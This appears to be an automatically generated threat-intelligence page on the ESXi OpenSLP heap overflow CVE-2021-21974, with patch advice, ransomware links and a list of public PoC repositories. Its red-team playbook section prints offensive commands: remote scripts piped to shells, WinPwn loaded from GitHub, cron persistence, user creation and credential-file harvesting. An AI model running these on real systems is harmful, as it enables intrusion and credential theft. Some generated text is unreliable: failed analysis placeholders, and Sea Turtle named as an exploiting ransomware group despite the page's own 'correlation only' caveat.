CVE-2021-21974
Overview
This vulnerability is a heap overflow caused by improper handling of network messages within the OpenSLP service in VMware ESXi. The flaw arises from insufficient bounds checking when processing requests received on UDP port 427, leading to memory corruption in the heap. The affected component is the OpenSLP daemon responsible for service location protocol operations in ESXi versions prior to specified patches.
Vulnerability Description
OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution.
Impact
An attacker within the same network segment can exploit this vulnerability without authentication to execute arbitrary code on the ESXi host with elevated privileges. This enables full compromise of the hypervisor, allowing control over hosted virtual machines and potential lateral movement within the infrastructure. The exploit can lead to complete system takeover, data breach, and disruption of virtualized services, severely impacting business operations.
Solution
VMware has released security updates addressing this issue in advisory VMSA-2021-0002. Affected ESXi versions 6.5, 6.7, and 7.0 should be updated to versions ESXi650-202102101-SG, ESXi670-202102401-SG, and ESXi70U1c-17325551 respectively. Detailed patch instructions and downloads are available at https://www.vmware.com/security/advisories/VMSA-2021-0002.html. Administrators should apply these updates promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
esxiargs
|
— | ransomware.live |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Sea Turtle
|
MEDIUM | — | correlation_mitre |
Full Analysis
A heap overflow vulnerability has been identified in the OpenSLP service utilized by specific versions of VMware ESXi, a popular hypervisor for deploying virtual machines. This vulnerability arises from improper handling of memory allocation, allowing an attacker to overwrite adjacent memory regions. When exploited, this can lead to arbitrary code execution, giving the attacker control over the affected system. The vulnerability is particularly concerning because it can be triggered remotely by an attacker who has access to the service's listening port (427) and resides within the same network segment as the ESXi host. This means that an attacker does not require extensive privileges or complex methods to exploit the vulnerability, making it accessible to individuals with basic network access.
The attack vector for this vulnerability is primarily network-based, where an adversary can send specially crafted requests to the OpenSLP service. Once the heap overflow is triggered, the attacker can manipulate the memory to execute arbitrary code, potentially leading to a complete compromise of the ESXi host. Scenarios could include deploying malware, creating unauthorized virtual machines, or disrupting services running on the hypervisor. Given that ESXi is often used in enterprise environments to host critical applications and services, the implications of such an attack could be severe, including data breaches, service outages, and significant operational disruptions.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on VMware ESXi for their virtualization needs. The risk extends beyond the immediate compromise of the hypervisor; it can lead to a cascading effect on all virtual machines hosted on the affected ESXi instance. This could result in unauthorized access to sensitive data, loss of intellectual property, and potential regulatory violations, depending on the nature of the data compromised. Furthermore, the reputational damage and financial costs associated with remediation efforts and potential legal liabilities could be significant, making this a high-priority issue for affected organizations.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching ESXi hosts to the latest versions is crucial, as VMware has released updates that address this vulnerability. Network segmentation can also be an effective strategy, limiting access to the OpenSLP service only to trusted devices and users. Additionally, employing intrusion detection systems (IDS) can help identify and alert on suspicious activities targeting the OpenSLP service. Organizations should also conduct regular security assessments and penetration testing to identify potential vulnerabilities in their environments, ensuring that they remain proactive in their security posture.
In conclusion, the heap overflow vulnerability in the OpenSLP service of VMware ESXi presents a significant threat to organizations utilizing this hypervisor. The ease of exploitation, combined with the potential for severe consequences, underscores the importance of timely detection and mitigation strategies. By prioritizing security updates, implementing network segmentation, and utilizing monitoring tools, organizations can better protect themselves against the risks associated with this vulnerability and maintain the integrity of their virtualized environments.
CSURFACE threat intelligence has identified a marked escalation in the exploitation landscape surrounding CVE-2021-21974. New publicly available proof-of-concept exploits have emerged across multiple repositories, accompanied by specialized scanning tools that facilitate identification of vulnerable VMware ESXi instances. This expansion of accessible offensive capabilities has coincided with the appearance of ransomware groups, notably esxiargs and Sea Turtle, leveraging this vulnerability to conduct targeted attacks. Our telemetry indicates a significant increase in exploitation attempts within network segments hosting ESXi environments, elevating the operational risk for organizations that have not applied the relevant patches. The vulnerability’s CVSS score adjustment to 8.8 and the EPSS score rising to a substantial 0.557 underscore its heightened exploitability and likelihood of being weaponized in the wild. Collectively, these developments amplify the threat level from moderate to high, reflecting a more active and sophisticated adversary interest that demands heightened vigilance in detection and response efforts.
Affected Products (233)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:2:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Shadow0ps/CVE-2021-21974
POC for CVE-2021-21974 VMWare ESXi RCE Exploit
|
Shadow0ps | 185 | 41 | 2021-05-25 | View |
|
Aiyakami/CVE-2021-21974
自研针对ESXI 堆栈溢出的CVE-2021-21974 POC,只支持项目给出的的目标和环境,用于学习和研究
|
Aiyakami | 3 | 0 | 2026-07-08 | View |
|
n2x4/Feb2023-CVE-2021-21974-OSINT
Analysis of the ransom demands from Shodan results
|
n2x4 | 2 | 0 | 2023-02-04 | View |
|
CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi
ESXi EZ - A custom scanner that takes list of IPs either in JSON, CSV or individually and checks for infection CVE-2021...
|
CYBERTHREATANALYSIS | 2 | 0 | 2023-02-08 | View |
|
hateme021202/cve-2021-21974
Nmap NSE script for cve-2021-21974
|
hateme021202 | 0 | 0 | 2023-10-19 | View |
|
mercylessghost/CVE-2021-21974
|
mercylessghost | 0 | 0 | 2025-01-10 | View |
|
abirasecurity/CVE-2021-21974_vuln_dectection
CVE-2021-21974 Vulnerability Detection Tool Safe PoC that identifies vulnerable SLP implementations without exploitation
|
abirasecurity | 0 | 0 | 2025-09-04 | View |
Ransomware Groups 2
Threat Feed
3 eventsRansomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21974 |
| vmware.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.vmware.com/security/advisories/VMSA-2021-0002.html |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-21-250/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162957/VMware-ESXi-OpenSLP-Heap-Overflow.html |